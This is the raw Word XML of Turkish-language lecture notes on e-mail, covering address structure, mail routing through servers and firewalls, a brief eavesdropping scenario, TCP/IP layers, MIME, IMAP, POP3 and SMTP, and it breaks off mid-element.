          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId154" w:history="1">
        <w:r w:rsidRPr="00E332D5">
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="000000" w:themeColor="text1"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>fikretozturk2525@hotmail.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00E332D5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Yukarıdaki örnek incelenirse e-posta adresi @ işareti ile ayrılmış iki kısımdan oluşmaktadır. Birinci kısım kişinin kendi sistemindeki kullanıcı adını; ikinci kısım ise, bulunduğu sistemin adresini belirtmektedir. </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6.MAİL AĞ MİMARİS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 xml:space="preserve">Kullanıcı_1  kullanıcı_4 bir  e-posta göndermek istiyor kullanıcı _4 ağa bağlıysa   tüm mail sistemleri  için   e-posta kullanıcı_1 den kullanıcı_4 gider. Kullanıcı _4 ağa bağlı değilse e posta daha sonra alma işlemi için  kullanıcı_4 ün posta sunucusunda saklanır. Posta sunucusu doğru çalışmıyorsa mesaj durdurulabilir. e-posta kullanıcı _1 in posta sunucusundan geçtikten sonra  güvenlik duvarı üzerinden yönlendirilir ve kullanıcı _4 ün güvenlik duvarı üzerinden </w:t>
      </w:r>
      <w:r w:rsidRPr="00E332D5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>geçerek kullanıcı _4 ‘ulaşır .Burada tüm yönlendirme ve protokollerin olduğu varsayılmaktadır</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00E332D5" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E332D5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5A00474A" wp14:editId="57BBC769">
            <wp:extent cx="5760720" cy="3230070"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="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30070"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:effectLst/>
                    <a:extLst/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00E332D5" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00E332D5" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="720"/>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7.KÖTÜ E-POSTA SENARYOSU:</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Kullanıcı _1 kullanıcı _4 bir mesaj  yazar ve gönderir. Uygun Heder başlığı eklenir  posta kutusundan posta sunucusuna  iletilir.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E332D5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ardından posta sunucusu Kurumsal güvenlik duvarı aracılığıyla verileri internete iletir. elektrik sinyalleri bilgisayarlardan yönlendirilenden ve router(tekrarlayıcıdan geçer) her bilgisayar  adres ve paketi kontrol  eder hedefine  yönlendiri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İnternet  trafiğini dinleyen  bilgisayar korsanı verileri olduğu gibi kopyalar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E332D5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Bu bilgileri   üçüncü tarafla paylaşabilirler.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E332D5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Posta alıcının güvenlik duvarına varır ve posta sunucusuna gönderilir.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E332D5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Alıcı mesajı posta sunucundan silmeden önce  yerel makinesine alır ve  ve okur.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E332D5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Bu tür olaylarla ilgili bir çok dava olmuştu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8.PROTOKOLLER:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00956210" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E332D5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Tcp/Ip beş katmanlı yapısı</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E332D5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>e –posta programı  e posta belgesini  taşıma katmanına gönderir.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E332D5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">taşıma </w:t>
      </w:r>
      <w:r w:rsidRPr="00E332D5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>katmanı kendi başlığını e-postaya ekler ve ağ katmanına gönderir.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E332D5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ağ katmanı veri çerçevelerini paketlere böler, pakete ek başlık bilgileri ekler ve paketleri veri bağlantı katmanına gönderi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Data-link katmanı, paketleri fiziksel katmana gönderir.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E332D5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>fiziksel  katman  dosyası ağ üzerinden elektrik sinyali olarak seri olarak iletir.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E332D5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>elektrik sinyalleri bilgisayarlardan yönlendirilenden ve router(tekrarlayıcıdan geçer) her bilgisayar  adres ve paketi kontrol  eder hedefine  yönlendirir.</w:t>
      </w:r>
      <w:r w:rsidRPr="00E332D5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:kern w:val="24"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>fiziksel katman paketleri data</w:t>
      </w:r>
      <w:r w:rsidRPr="00956210">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>l</w:t>
      </w:r>
      <w:r w:rsidRPr="00956210">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ink katmanına gönderir hedef bilgisayara ulaşmak için data link katmanı bilgileri  ağ katmanına gönderir. Ağ katmanı  fiziksel bilgileri  tekrar bir araya getirir. paket ve header bilgilerini kontrol eder ve paketi taşıma katmanına gönderir. Ulaşım katmanı tüm dosyası  bir araya getiri ve uygulama katmanına gönderir uygulama  katmanında  e-posta  programı verileri kullanıcıya  ilet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lastRenderedPageBreak/>
        <w:t>9.ÇOK AMAÇLI İNTERNET POSTA UZANTILARI(MIME):</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Çok Amaçlı posta uzantıları POP,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E332D5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>veya E posta istemcileri  Usenet  ile birlikte kullanılabilirler</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00E332D5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>MIME internet posta biçimini genişletmiştir.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E332D5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>e-postaların sınırlı yeteneklerini genişletmek amacıyla 1991 yılında Belli Communications tarafından önerilen bir standarttır. </w:t>
      </w:r>
      <w:r w:rsidRPr="00E332D5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>MIME, ASCII olmayan verilerin SMTP yoluyla gönderilmesine izin veren </w:t>
      </w:r>
      <w:r w:rsidRPr="00E332D5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>bir ekleme veya ek protokoldür</w:t>
      </w:r>
      <w:r w:rsidRPr="00E332D5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> . Kullanıcıların internette farklı türde veri dosyaları alışverişinde bulunmalarına izin verir: ses, video, görüntüler, uygulama programları.</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SMTP çok basit bir yapıya sahiptir. Yalnızca (SMTP) 7 bit ASCII formatındaki mesajları gönderir.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E332D5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">FRANSIZCA ALMANCA RUSÇA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ÇİNCE v</w:t>
      </w:r>
      <w:r w:rsidRPr="00E332D5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">e JAPONCA </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7 bit ASCİİ formatını desteklemeyen diller için MIME kullanılır Video ses verileri gönderilebili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MIME protokolü ile yollanan bir mesajda çeşitli bölümler bulunmaktadır. Bunlar şöyle sıralanabilir: Başlık bölümü (header) bu bölümde MIME sürümü (versiyon) ve içerik bilgileri yollanır.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E332D5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Mesajın içeriği bölümü. Bu bölüm, ilk kesmeden sonra başlar ve ikinci kesmeye kadar sürer. Basitçe postamızda yazıların bulunduğu ana bölümdür ve postanın içeriğini belirle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Ekler bölümü. Bu bölüm 2. kesme ile başlar ve 3. kesmeye kadar devam eder. Burada postanın ekleri yer alır. Birden fazla ek varsa bu kesme sayısı arttırılarak her dosya eki için bir yeni alan açılır. Nihayet son kesme ile MIME protokolündeki posta sona erdir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10.İNTERNET  İLETİ  ERİŞİM PROTOKOLÜ(IMAP):</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IMAP Stanford Üniversitesi'nde geliştirilmiştir. IMAP4 olarak de bilinen IMAP, yerel kullanıcıların uzaktaki bir e-posta sunucusuna erişmesini sağlayan bir uygulama katmanı protokolüdür.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E332D5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>IMAP mailleri size server üzerinden gösterir.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E332D5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Mailler lokal bilgisayara  indirilemez sadece server üzerinde saklanı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IMAP protokolünde maillerinizi kontrol ettiğinizde bilgisayarınızda hiç birşey saklanmaz, tüm veriler server üzerindedir.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E332D5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>IMAP sunucusunda saklanan e-postalar masa üstünden ,evden iş yerinden seyahat ederken erişileb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 xml:space="preserve">IMAP protokolünün çalışma şekli </w:t>
      </w:r>
      <w:r w:rsidRPr="00E332D5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="59DDE5B4" wp14:editId="30C20D13">
            <wp:extent cx="5760720" cy="265497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2654978"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:effectLst/>
                    <a:extLst/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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11.POP(POST OFFİCE PROTOKOL):</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lastRenderedPageBreak/>
        <w:t>e-posta almak için kullanılır.</w:t>
      </w:r>
      <w:r w:rsidRPr="00956210">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>POP3</w:t>
      </w:r>
      <w:r w:rsidRPr="00956210">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> (</w:t>
      </w:r>
      <w:r w:rsidRPr="00956210">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidRPr="00956210">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ost </w:t>
      </w:r>
      <w:r w:rsidRPr="00956210">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>O</w:t>
      </w:r>
      <w:r w:rsidRPr="00956210">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ffice </w:t>
      </w:r>
      <w:r w:rsidRPr="00956210">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidRPr="00956210">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>rotocol</w:t>
      </w:r>
      <w:r w:rsidRPr="00E332D5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> versiyon </w:t>
      </w:r>
      <w:r w:rsidRPr="00E332D5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00E332D5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>), Outlook, Thunderbird, Windows Mail, </w:t>
      </w:r>
      <w:hyperlink r:id="rId157" w:history="1">
        <w:r w:rsidRPr="00E332D5">
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="000000" w:themeColor="text1"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>Mac Mail</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00E332D5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E332D5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>gibi yerel e mail istemcilerinin uzak e mail sunucusu ile iletişim kurmasında ve e mailleri indirmesinde kullanılır.POP3 Tek yönlü iletişi(yani veriler sunucudan alınır istemciye gönder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IMAP VE POST ARASINDAKİ FARK:</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IMAP VE POP   Posta Protokolleri için bir sunucudur. POP Mailleri  posta sunucusundan kullanıcı kendi makinesine indirerek  okur. IMAP posta sunucusundan indirmeden de mailler okunab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12.SMTP:</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Basit Posta Aktarım Protokolü</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E332D5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>internet yardımıyla 25 numaralı </w:t>
      </w:r>
      <w:hyperlink r:id="rId158" w:history="1">
        <w:r w:rsidRPr="00956210">
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="000000" w:themeColor="text1"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>port</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00956210">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> üzerinden </w:t>
      </w:r>
      <w:hyperlink r:id="rId159" w:history="1">
        <w:r w:rsidRPr="00956210">
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="000000" w:themeColor="text1"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>e-mail</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00956210">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
